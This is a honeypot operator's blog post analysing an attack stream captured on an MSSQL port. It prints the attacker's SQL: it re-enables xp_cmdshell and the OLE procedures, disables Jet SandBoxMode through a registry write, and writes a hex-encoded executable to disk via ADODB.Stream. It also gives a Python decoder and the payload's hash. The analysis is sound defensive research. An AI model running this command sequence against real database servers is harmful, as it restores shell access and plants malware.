Even though I'm not the only reporting attacks on MSSQL, I've had no shiny attacks addressing the brand new mssql code for dionaea yet, I think due to protocol bugs. But I've had some nfq gathered bistreams which could be replayed to the mssql service.
The bistream replayed was collected on 2010-08-09 and was contributed by 182.236.160.29 to my port 1433/tcp. I choose this bistream for its size, which is 245625bytes, and the largest bistream I captured for mssql.
After resolving some issues, I was able to dump the commands send to the database into a text file.
While I like databases, I'm not an expert for MSSQL, comments are open, feel free to enlighten me on this procedure.
My guess is, it creates exports from a bunch of standards dlls, to assist in writing the file.
exec sp_server_info 18use master CREATE procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ AS SET implicit_transactions off IF @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') RETURN (1) end dbcc addextendedproc( @functname, @dllname) RETURN (0) -- sp_addextendedproc exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' exec sp_addextendedproc xp_dirtree,'xpstar.dll' exec sp_addextendedproc xp_enumgroups,'xplog70.dll' exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' exec sp_addextendedproc xp_loginconfig,'xplog70.dll' exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' exec sp_addextendedproc sp_OACreate,'odsole70.dll' exec sp_addextendedproc sp_OADestroy,'odsole70.dll' exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAMethod,'odsole70.dll' exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAStop,'odsole70.dll' exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' exec sp_addextendedproc xp_regread,'xpstar.dll' exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' exec sp_addextendedproc xp_regwrite,'xpstar.dll' exec sp_addextendedproc xp_availablemedia,'xpstar.dll' exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' exec sp_dropextendedproc "xp_cmdshell" exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' exec sp_dropextendedproc 'xp_cmdshell' exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' exec sp_addextendedproc xp_dirtree,'xpstar.dll' exec sp_addextendedproc xp_enumgroups,'xplog70.dll' exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' exec sp_addextendedproc xp_loginconfig,'xplog70.dll' exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' exec sp_addextendedproc sp_OACreate,'odsole70.dll' exec sp_addextendedproc sp_OADestroy,'odsole70.dll' exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAMethod,'odsole70.dll' exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAStop,'odsole70.dll' exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' exec sp_addextendedproc xp_regread,'xpstar.dll' exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' exec sp_addextendedproc xp_regwrite,'xpstar.dll' exec sp_addextendedproc xp_availablemedia,'xpstar.dll' dbcc addextendedproc ("sp_oacreate","odsole70.dll") EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken exec sp_dropextendedproc "xp_cmdshell" exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll' exec sp_dropextendedproc 'xp_cmdshell' exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT dbcc addextendedproc("xp_cmdshell","xpweb70.dll") dbcc addextendedproc("xp_cmdshell", "xpsql70.dll") dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 DECLARE @ObjectToken INT EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken, 'Type', 1 EXEC sp_OAMethod @ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x4D5A5...1001103310011033100110
So I guess'ed, this would open a file, with unknown filename, and write something to the file, my guess was the files content would be hex encoded.
Extracting this hex encoded string and decoding it with
f = open('/tmp/mssql_file','rb') h = f.readline() h = h[:-2] # remove \r\n b = bytes.fromhex(h.decode()) t = open('/tmp/mssql_file._bin','wb+') t.write(b) # 98677 t.close()
The resulting file is 98677 bytes large, got the md5 hash f0d60ea0dd56c06c96c80d2409ee6348, and got very poor detection according to virustotal, most likely it is incomplete or broken.
While I think the current version of the mssql code won't be able to fool an attacker who is using the mssql client api to connect long enough to get such results, it is at least a really promising start.
2
2010/08/30 00:36
[…] 2010:08:27:attacks_on_mssql [carnivore news] […]